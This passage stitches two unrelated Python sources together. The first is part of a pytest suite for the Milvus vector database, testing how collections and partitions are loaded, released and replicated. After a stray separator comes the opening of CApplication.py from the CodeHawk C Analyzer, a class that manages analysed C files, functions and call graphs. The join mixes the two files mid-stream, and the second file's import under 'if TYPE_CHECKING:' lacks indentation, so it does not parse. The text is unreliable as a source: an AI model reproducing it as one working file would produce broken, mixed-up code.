        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.release()

    @pytest.mark.tags(CaseLabel.L0)
    def test_load_collection_after_load_release(self):
        """
        target: test load collection after load and release
        method: 1.load and release collection after entities flushed
                2.re-load collection
        expected: No exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        insert_data = cf.gen_default_list_data()
        collection_w.insert(data=insert_data)
        assert collection_w.num_entities == ct.default_nb
        collection_w.load()
        collection_w.release()
        collection_w.load()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_repeatedly(self):
        """
        target: test load collection repeatedly
        method: load collection twice
        expected: No exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        insert_data = cf.gen_default_list_data()
        collection_w.insert(data=insert_data)
        assert collection_w.num_entities == ct.default_nb
        collection_w.load()
        collection_w.load()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_release_collection(self):
        """
        target: test load, release non-exist collection
        method: 1. load, release and drop collection
                2. load and release dropped collection
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.load()
        collection_wr.release()
        collection_wr.drop()
        error = {ct.err_code: 0,
                 ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
        collection_wr.load(check_task=CheckTasks.err_res, check_items=error)
        collection_wr.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L0)
    def test_release_collection_after_drop(self):
        """
        target: test release collection after drop
        method: insert and flush, then release collection after load and drop
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.load()
        collection_wr.drop()
        error = {ct.err_code: 0,
                 ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
        collection_wr.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L0)
    def test_load_partitions_release_collection(self):
        """
        target: test release collection after load partitions
        method: insert entities into partitions, load partitions and release collection
        expected: search result empty
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        # renamed from `patition_w` (typo); local variable only
        partition_w = self.init_partition_wrap(collection_wrap=collection_w, name=ct.default_tag)
        data = cf.gen_default_list_data()
        collection_w.insert(data=data, partition_name=ct.default_tag)
        assert collection_w.num_entities == ct.default_nb
        partition_w.load()
        collection_w.release()

    @pytest.fixture(scope="function", params=ct.get_invalid_strs)
    def get_non_number_replicas(self, request):
        # 1 and None are accepted replica numbers, so they are skipped here
        if request.param == 1:
            pytest.skip("1 is valid replica number")
        if request.param is None:
            pytest.skip("None is valid replica number")
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_replica_non_number(self, get_non_number_replicas):
        """
        target: test load collection with non-number replicas
        method: load with non-number replicas
        expected: raise exceptions
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df = cf.gen_default_dataframe_data()
        insert_res, _ = collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        # load with non-number replicas
        error = {ct.err_code: 0, ct.err_msg: f"but expected one of: int, long"}
        collection_w.load(replica_number=get_non_number_replicas, check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("replicas", [-1, 0, None])
    def test_load_replica_invalid_number(self, replicas):
        """
        target: test load collection with out-of-range or None replica number
        method: load with replica number -1, 0 and None
        expected: load succeeds and falls back to a single replica group
                  (asserted below: one group, two shards)
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df = cf.gen_default_dataframe_data()
        insert_res, _ = collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        collection_w.load(replica_number=replicas)
        replicas = collection_w.get_replicas()[0]
        groups = replicas.groups
        assert len(groups) == 1
        assert len(groups[0].shards) == 2

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_replica_greater_than_querynodes(self):
        """
        target: test load with replicas that greater than querynodes
        method: load with 3 replicas (2 querynode)
        expected: Raise exception
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df = cf.gen_default_dataframe_data()
        insert_res, _ = collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        error = {ct.err_code: 1, ct.err_msg: f"no enough nodes to create replicas"}
        collection_w.load(replica_number=3, check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_replica_change(self):
        """
        target: test load replica change
        method: 1.load with replica 1
                2.load with a new replica number
                3.release collection
                4.load with a new replica
        expected: The second time successfully loaded with a new replica number
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df = cf.gen_default_dataframe_data()
        insert_res, _ = collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        collection_w.load(replica_number=1)
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0]")
        # verify load different replicas thrown an exception
        error = {ct.err_code: 5, ct.err_msg: f"Should release first then reload with the new number of replicas"}
        collection_w.load(replica_number=2, check_task=CheckTasks.err_res, check_items=error)
        one_replica, _ = collection_w.get_replicas()
        assert len(one_replica.groups) == 1
        collection_w.release()
        collection_w.load(replica_number=2)
        two_replicas, _ = collection_w.get_replicas()
        assert len(two_replicas.groups) == 2
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
                           check_items={'exp_res': [{'int64': 0}]})
        # verify loaded segments included 2 replicas and twice num entities
        seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
        seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
        num_entities = list(map(lambda seg: seg.num_rows, seg_info))
        # XOR of ids == 0 means every segment id appears an even number of
        # times, i.e. each segment is loaded on both replicas
        assert reduce(lambda x, y: x ^ y, seg_ids) == 0
        assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_replica_multi(self):
        """
        target: test load with multiple replicas
        method: 1.create collection with one shards
                2.insert multiple segments
                3.load with multiple replicas
                4.query and search
        expected: Query and search successfully
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
        tmp_nb = 1000
        replica_number = 2
        for i in range(replica_number):
            df = cf.gen_default_dataframe_data(nb=tmp_nb, start=i * tmp_nb)
            insert_res, _ = collection_w.insert(df)
            assert collection_w.num_entities == (i + 1) * tmp_nb
        collection_w.load(replica_number=replica_number)
        replicas = collection_w.get_replicas()[0]
        assert len(replicas.groups) == replica_number
        query_res, _ = collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {tmp_nb}]")
        assert len(query_res) == 2
        search_res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
        assert len(search_res[0]) == ct.default_limit

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_replica_partitions(self):
        """
        target: test load replica with partitions
        method: 1.Create collection and one partition
                2.Insert data into collection and partition
                3.Load multi replicas with partition
                4.Query
        expected: Verify query result
        """
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df_1 = cf.gen_default_dataframe_data(nb=default_nb)
        df_2 = cf.gen_default_dataframe_data(nb=default_nb, start=default_nb)
        collection_w.insert(df_1)
        partition_w = self.init_partition_wrap(collection_w, ct.default_tag)
        partition_w.insert(df_2)
        assert collection_w.num_entities == ct.default_nb * 2
        collection_w.load([partition_w.name], replica_number=2)
        # default tag query 0 empty
        # BUGFIX: was `check_tasks=...` (typo); the wrapper only recognizes
        # `check_task`, so the empty-result verification silently never ran.
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", partition_names=[ct.default_tag],
                           check_task=CheckTasks.check_query_empty)
        # default query 0 empty
        collection_w.query(expr=f"{ct.default_int64_field_name} in [3000]",
                           check_task=CheckTasks.check_query_results,
                           check_items={'exp_res': df_2.iloc[:1, :1].to_dict('records')})
        error = {ct.err_code: 1, ct.err_msg: f"not loaded into memory"}
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0]",
                           partition_names=[ct.default_partition_name, ct.default_tag],
                           check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L3)
    def test_load_replica_non_shard_leader(self):
        """
        target: test replica groups which one of QN is not shard leader
        method: 1.deploy cluster with 5 QNs
                2.create collection with 2 shards
                3.insert and flush
                4.load with 2 replica number
                5.insert growing data
                6.search and query
        expected: Verify search and query results
        """
        # create and insert entities
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=2)
        df = cf.gen_default_dataframe_data()
        collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        # load with multi replica and insert growing data
        collection_w.load(replica_number=2)
        df_growing = cf.gen_default_dataframe_data(100, start=ct.default_nb)
        collection_w.insert(df_growing)
        replicas = collection_w.get_replicas()[0]
        # verify there are 2 groups (2 replicas)
        assert len(replicas.groups) == 2
        log.debug(replicas)
        for group in replicas.groups:
            # verify each group has 2 shards
            assert len(group.shards) == 2
            shard_leaders = []
            # verify one group has 3 querynodes, and one of the querynodes isn't shard leader
            if len(group.group_nodes) == 3:
                for shard in group.shards:
                    shard_leaders.append(shard.shard_leader)
                assert len(shard_leaders) == 2
        # Verify 2 replicas segments loaded
        seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
        seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
        assert reduce(lambda x, y: x ^ y, seg_ids) == 0
        # verify search successfully
        res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
        assert len(res[0]) == ct.default_limit
        # verify query sealed and growing data successfully
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {ct.default_nb}]",
                           check_task=CheckTasks.check_query_results,
                           check_items={'exp_res': [{'int64': 0}, {'int64': 3000}]})

    @pytest.mark.tags(CaseLabel.L3)
    def test_load_replica_multiple_shard_leader(self):
        """
        target: test replica groups which one of QN is shard leader of multiple shards
        method: 1.deploy cluster with 5 QNs
                2.create collection with 3 shards
                3.insert and flush
                4.load with 2 replica number
                5.insert growing data
                6.search and query
        expected: Verify search and query results
        """
        # create and insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=3)
        df = cf.gen_default_dataframe_data()
        collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        # load with multi replicas and insert growing data
        collection_w.load(replica_number=2)
        df_growing = cf.gen_default_dataframe_data(100, start=ct.default_nb)
        collection_w.insert(df_growing)
        # verify replica infos
        replicas, _ = collection_w.get_replicas()
        log.debug(replicas)
        assert len(replicas.groups) == 2
        for group in replicas.groups:
            # verify each group has 3 shards
            assert len(group.shards) == 3
            # verify one group has 2 querynodes, and one of the querynodes subscribes 2 dml channels
            shard_leaders = []
            if len(group.group_nodes) == 2:
                for shard in group.shards:
                    shard_leaders.append(shard.shard_leader)
                assert len(shard_leaders) == 3 and len(set(shard_leaders)) == 2
        # Verify 2 replicas segments loaded
        seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
        seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
        assert reduce(lambda x, y: x ^ y, seg_ids) == 0
        # Verify search successfully
        res, _ = collection_w.search(vectors, default_search_field, default_search_params, default_limit)
        assert len(res[0]) == ct.default_limit
        # Verify query sealed and growing entities successfully
        collection_w.query(expr=f"{ct.default_int64_field_name} in [0, {ct.default_nb}]",
                           check_task=CheckTasks.check_query_results,
                           check_items={'exp_res': [{'int64': 0}, {'int64': 3000}]})

    # https://github.com/milvus-io/milvus/issues/16726
    @pytest.mark.tags(CaseLabel.L2)
    def test_get_collection_replicas_not_loaded(self):
        """
        target: test get replicas of not loaded collection
        method: not loaded collection and get replicas
        expected: raise an exception
        """
        # create, insert
        collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
        df = cf.gen_default_dataframe_data()
        insert_res, _ = collection_w.insert(df)
        assert collection_w.num_entities == ct.default_nb
        collection_w.get_replicas(check_task=CheckTasks.err_res,
                                  check_items={"err_code": 15, "err_msg": "getCollectionInfoByID: can't find collectionID"})
class TestReleaseAdvanced(TestcaseBase):
    """Release-while-searching scenarios for collections and partitions.

    Each case starts an (async) search, releases the target underneath it,
    then verifies that a subsequent search fails with the expected error.
    """

    @pytest.mark.tags(CaseLabel.L0)
    def test_release_collection_during_searching(self):
        """
        target: test release collection during searching
        method: insert entities into collection, flush and load collection, release collection during searching
        expected: raise exception
        """
        self._connect()
        data = cf.gen_default_list_data()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.insert(data=data)
        # reading num_entities flushes/seals the inserted data
        assert collection_wr.num_entities == ct.default_nb
        collection_wr.load()
        # fire an async search so the release below overlaps with it
        search_res, _ = collection_wr.search(vectors, default_search_field, default_search_params,
                                             default_limit, _async=True)
        collection_wr.release()
        # a subsequent synchronous search on the released collection must fail
        error = {ct.err_code: 1, ct.err_msg: 'collection %s was not loaded into memory' % c_name}
        collection_wr.search(vectors, default_search_field, default_search_params, default_limit,
                             check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_release_partition_during_searching(self):
        """
        target: test release partition during searching
        method: insert entities into partition, flush and load partition, release partition during searching
        expected: raise exception
        """
        self._connect()
        partition_num = 1
        collection_w = self.init_collection_general(prefix, True, 10, partition_num, is_index=True)[0]
        par = collection_w.partitions
        par_name = par[partition_num].name
        par[partition_num].load()
        limit = 10
        # first search succeeds while the partition is loaded
        collection_w.search(vectors, default_search_field,
                            default_search_params, limit, default_search_exp,
                            [par_name])
        par[partition_num].release()
        # searching the released partition must fail
        collection_w.search(vectors, default_search_field,
                            default_search_params, limit, default_search_exp,
                            [par_name],
                            check_task=CheckTasks.err_res,
                            check_items={"err_code": 1,
                                         "err_msg": "partition has been released"})

    @pytest.mark.tags(CaseLabel.L0)
    def test_release_indexed_collection_during_searching(self):
        """
        target: test release indexed collection during searching
        method: insert entities into partition, flush and load partition, release collection during searching
        expected: raise exception
        """
        self._connect()
        partition_num = 1
        collection_w = self.init_collection_general(prefix, True, 10, partition_num, is_index=True)[0]
        par = collection_w.partitions
        par_name = par[partition_num].name
        par[partition_num].load()
        limit = 10
        # async search so the whole-collection release overlaps with it
        collection_w.search(vectors, default_search_field,
                            default_search_params, limit, default_search_exp,
                            [par_name], _async=True)
        collection_w.release()
        error = {ct.err_code: 1, ct.err_msg: 'collection %s was not loaded into memory' % collection_w.name}
        collection_w.search(vectors, default_search_field,
                            default_search_params, limit, default_search_exp,
                            [par_name],
                            check_task=CheckTasks.err_res,
                            check_items=error)
class TestLoadPartition(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test `load_collection` function
    ******************************************************************
    """

    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        """Parametrized fixture yielding one simple (float-vector) index config."""
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in cpu mode")
        return request.param

    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_binary_index(self, request):
        """Parametrized fixture yielding one binary index config; skips unsupported types."""
        log.info(request.param)
        if request.param["index_type"] in ct.binary_support:
            return request.param
        else:
            pytest.skip("Skip index Temporary")

    @pytest.mark.tags(CaseLabel.L0)
    def test_load_partition_after_index_binary(self, get_binary_index):
        """
        target: test load binary_collection, after index created
        method: insert and create index, load binary_collection with correct params
        expected: no error raised
        """
        self._connect()
        partition_num = 1
        collection_w = self.init_collection_general(prefix, True, ct.default_nb, partition_num,
                                                    is_binary=True, is_index=True)[0]
        # try every binary metric against the parametrized index type
        for metric_type in ct.binary_metrics:
            log.info(metric_type)
            get_binary_index["metric_type"] = metric_type
            if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in ct.structure_metrics:
                # NOTE(review): the expected message interpolates metric_type into the
                # "index type" slot — presumably mirrors the server's wording; confirm.
                error = {ct.err_code: -1, ct.err_msg: 'Invalid metric_type: SUBSTRUCTURE, '
                                                      'which does not match the index type: %s' % metric_type}
                collection_w.create_index(ct.default_binary_vec_field_name, get_binary_index,
                                          check_task=CheckTasks.err_res, check_items=error)
            else:
                collection_w.create_index(ct.default_binary_vec_field_name, get_binary_index)
                par = collection_w.partitions
                par[partition_num].load()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_partition_dis_connect(self):
        """
        target: test load partition, without connection
        method: load partition with correct params, with a disconnected instance
        expected: load raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        partition_w.load()
        # drop the connection, then verify load fails client-side
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first.'}
        partition_w.load(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_release_partition_dis_connect(self, connect, dis_connect, collection):
        """
        target: test release collection, without connection
        method: release collection with correct params, with a disconnected instance
        expected: release raise exception
        """
        # NOTE(review): the connect/dis_connect/collection fixture args are unused here.
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        partition_w.load()
        # drop the connection, then verify release fails client-side
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first.'}
        partition_w.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_partition_not_existed(self, connect, collection):
        """
        target: test load partition for invalid scenario
        method: load not existed partition
        expected: raise exception and report the error
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        # drop the partition so the subsequent load targets a missing partition
        partition_w.drop()
        error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
        partition_w.load(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L0)
    def test_release_partition_not_load(self):
        """
        target: test release partition without load
        method: release partition without load
        expected: release success
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        # releasing a never-loaded partition is expected to succeed silently
        partition_w.release()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_release_after_drop(self, connect, collection):
        """
        target: test load and release partition after drop
        method: drop partition and then load and release it
        expected: raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        partition_w.drop()
        # both load and release on the dropped partition report the same error
        error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
        partition_w.load(check_task=CheckTasks.err_res, check_items=error)
        partition_w.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L0)
    def test_release_partition_after_drop(self, connect, collection):
        """
        target: test release collection after drop
        method: insert and flush, then release collection after load and drop
        expected: raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        partition_w.drop()
        error = {ct.err_code: 0, ct.err_msg: 'partitionID of partitionName:%s can not be find' % partition_name}
        partition_w.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L0)
    def test_load_release_after_collection_drop(self, connect, collection):
        """
        target: test release collection after drop
        method: insert and flush, then release collection after load and drop
        expected: raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        name = collection_w.name
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        partition_w = self.init_partition_wrap(collection_w, partition_name,
                                               description=description,
                                               check_task=CheckTasks.check_partition_property,
                                               check_items={"name": partition_name, "description": description,
                                                            "is_empty": True, "num_entities": 0}
                                               )
        # dropping the whole collection invalidates the partition handle too
        collection_w.drop()
        error = {ct.err_code: 0, ct.err_msg: "HasPartition failed: can\'t find collection: %s" % name}
        partition_w.load(check_task=CheckTasks.err_res, check_items=error)
        partition_w.release(check_task=CheckTasks.err_res, check_items=error)
|
CApplication.py | # ------------------------------------------------------------------------------
# CodeHawk C Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2017-2020 Kestrel Technology LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, List, Optional, TYPE_CHECKING
import os
import logging
import multiprocessing
import sys
import chc.util.fileutil as UF
from chc.api.CGlobalContract import CGlobalContract
from chc.app.CCompInfo import CCompInfo
from chc.app.CFile import CFile
from chc.app.CVarInfo import CVarInfo
from chc.app.IndexManager import IndexManager
from chc.app.CGlobalDeclarations import CGlobalDeclarations
from chc.source.CSrcFile import CSrcFile
if TYPE_CHECKING:
from chc.app.CFunction import CFunction
class CApplication(object):
    """Primary access point for source code and analysis results.

    Wraps the per-file analysis artifacts under ``path``: file/function
    lookup, global declarations, a lazily-built call graph, proof-obligation
    traversal, and aggregate statistics. In single-file mode (``cfilename``
    given) only that file is initialized.
    """

    def __init__(
        self,
        path: str,
        cfilename: Optional[str] = None,
        srcpath: Optional[str] = None,
        contractpath: Optional[str] = None,
        candidate_contractpath: Optional[str] = None,
        excludefiles: List[str] = [],
        includefiles: Optional[List[str]] = None,
    ) -> None:
        # NOTE(review): excludefiles uses a mutable default argument; callers
        # that mutate it would share state across instances — confirm unused.
        self.singlefile = not (cfilename is None)
        self.path = UF.get_chc_artifacts_path(path)
        self.srcpath = os.path.join(path, "sourcefiles") if srcpath is None else srcpath
        self.contractpath = contractpath
        self.globalcontract = None
        self.excludefiles = excludefiles  # files analyzed: all excluding these
        # files analyzed (if not None): these
        self.includefiles = includefiles
        if self.contractpath is not None:
            self.globalcontract = CGlobalContract(self)
        self.candidate_contractpath = candidate_contractpath
        self.filenames: Dict[int, str] = {}  # file index -> filename
        self.files: Dict[str, CFile] = {}  # filename -> CFile
        if self.singlefile:
            self.declarations = None  # TBD: set to CFileDeclarations
        else:
            self.declarations = CGlobalDeclarations(self)
        self.indexmanager = IndexManager(self.singlefile)
        self.callgraph: Dict[Any, Any] = {}  # (fid,vid) -> (callsitespos, (tgtfid,tgtvid))
        self.revcallgraph: Dict[Any, Any] = {}  # (tgtfid,tgtvid) -> ((fid,vid),callsitespos)
        self._initialize(cfilename)

    def get_filenames(self) -> Iterable[str]:
        """Return the names of all application files."""
        return self.filenames.values()

    def is_application_header(self, name: str) -> bool:
        """Return true if name is a base filename (stem of some .c file)."""
        # compares against each filename with its 2-char extension stripped;
        # the for/else returns False only after all names have been checked
        for n in self.get_filenames():
            if name == os.path.basename(n[:-2]):
                return True
        else:
            return False

    def get_max_filename_length(self) -> int:
        """Return the length of the longest filename (used for table layout)."""
        return max([len(x) for x in self.get_filenames()])

    def get_filename_dictionary(self) -> Dict[str, List[str]]:
        """Return a map from filename to the names of its functions."""
        result: Dict[str, List[str]] = {}
        for f in self.get_files():
            result[f.name] = []
            for fn in f.get_functions():
                result[f.name].append(fn.name)
        return result

    def get_files(self) -> Iterable[CFile]:
        """Return all CFile objects, sorted by name (initializes lazily)."""
        self._initialize_files()
        return sorted(self.files.values(), key=lambda x: x.name)

    def has_single_file(self) -> bool:
        # index 0 is only populated in single-file mode
        return 0 in self.filenames

    def get_single_file(self) -> CFile:
        """Return the file of a single-file application, or raise with candidates."""
        if 0 in self.filenames:
            return self.files[self.filenames[0]]
        else:
            tgtxnode = UF.get_targetfiles_xnode(self.path)
            if not tgtxnode:
                raise UF.CHCSingleCFileNotFoundError([])
            filenames = [(c.get("name") or "") for c in tgtxnode.findall("c-file")]
            raise UF.CHCSingleCFileNotFoundError(filenames)

    def get_cfile(self) -> CFile:
        """Return the single file; raise if not in single-file mode."""
        if self.singlefile:
            return self.get_single_file()
        raise UF.CHCSingleCFileNotFoundError([])

    def get_file(self, fname: str) -> CFile:
        """Return the CFile for fname, loading it on demand."""
        self._initialize_files()
        index = self.get_file_index(fname)
        self._initialize_file(index, fname)
        if fname in self.files:
            return self.files[fname]
        raise Exception("Could not find file \"" + fname + "\"")

    def get_file_by_index(self, index: int) -> CFile:
        """Return the CFile registered under the given file index."""
        if index in self.filenames:
            return self.get_file(self.filenames[index])
        raise Exception("Could not find file with index \"" + str(index) + "\"")

    def get_file_index(self, fname: str) -> int:
        """Return the file index for fname (linear scan over filenames)."""
        for i in self.filenames:
            if self.filenames[i] == fname:
                return i
        raise Exception("Could not find file named \"" + fname + "\"")

    def get_srcfile(self, fname: str) -> CSrcFile:
        """Return a source-file accessor for fname under srcpath."""
        srcfile = os.path.join(self.srcpath, fname)
        return CSrcFile(self, srcfile)

    def get_callsites(self, fid, vid):
        """Return a list of ((fid,vid),callsitespos) that call function (fid,vid)."""
        self._initialize_callgraphs()
        if (fid, vid) in self.revcallgraph:
            return self.revcallgraph[(fid, vid)]
        return []

    def iter_files(self, f: Callable[[CFile], None]) -> None:
        """Apply f to every file."""
        for file in self.get_files():
            f(file)

    def iter_files_parallel(self, f: Callable[[CFile], None], processes: int) -> None:
        """Apply f to every file in up to `processes` worker processes.

        NOTE(review): both waits are busy-wait loops (no sleep/join), which
        burns a core while workers run; the loop variable is a CFile despite
        being named fname.
        """
        for fname in self.get_files():
            while len(multiprocessing.active_children()) >= processes:
                pass
            multiprocessing.Process(target=f, args=(fname,)).start()
        while len(multiprocessing.active_children()) > 0:
            pass

    def iter_filenames(self, f: Callable[[str], None]) -> None:
        """Apply f to every filename."""
        for fname in self.filenames.values():
            f(fname)

    def iter_filenames_parallel(self, f: Callable[[str], None], processes: int) -> None:
        """Apply f to every filename in up to `processes` worker processes (busy-waits)."""
        for fname in self.filenames.values():
            while len(multiprocessing.active_children()) >= processes:
                pass
            multiprocessing.Process(target=f, args=(fname,)).start()
        while len(multiprocessing.active_children()) > 0:
            pass

    def iter_functions(self, f: Callable[["CFunction"], None]) -> None:
        """Apply f to every function of every file."""
        def g(fi: CFile) -> None:
            fi.iter_functions(f)
        self.iter_files(g)

    def iter_functions_parallel(self, f: Callable[["CFunction"], None], maxprocesses: int) -> None:
        """Apply f to every function, parallelized per file."""
        def g(fi: CFile) -> None:
            fi.iter_functions(f)
        self.iter_files_parallel(g, maxprocesses)

    def resolve_vid_function(self, fid, vid):
        """Resolve (fid,vid) to the defining CFunction, or None (with a warning).

        NOTE(review): the final path falls off the end and returns None
        implicitly after logging "Unable to resolve".
        """
        msg = "resolve-vid-function(" + str(fid) + "," + str(vid) + "):"
        result = self.indexmanager.resolve_vid(fid, vid)
        if result is not None:
            tgtfid = result[0]
            tgtvid = result[1]
            if tgtfid in self.filenames:
                filename = self.filenames[tgtfid]
                self._initialize_file(tgtfid, filename)
                if not self.files[filename] is None:
                    return self.files[filename].get_function_by_index(tgtvid)
                logging.warning(msg + "Filename not found: " + filename)
                return None
            logging.warning(msg + "Target fid " + str(tgtfid) + " not found")
            return None
        logging.warning(msg + "Unable to resolve")

    def convert_vid(self, fidsrc, vid, fidtgt):
        """Translate a variable id from one file's index space to another's."""
        return self.indexmanager.convert_vid(fidsrc, vid, fidtgt)

    def get_gckey(self, fid, ckey):
        """Return the global compinfo key for a file-local ckey."""
        return self.indexmanager.get_gckey(fid, ckey)
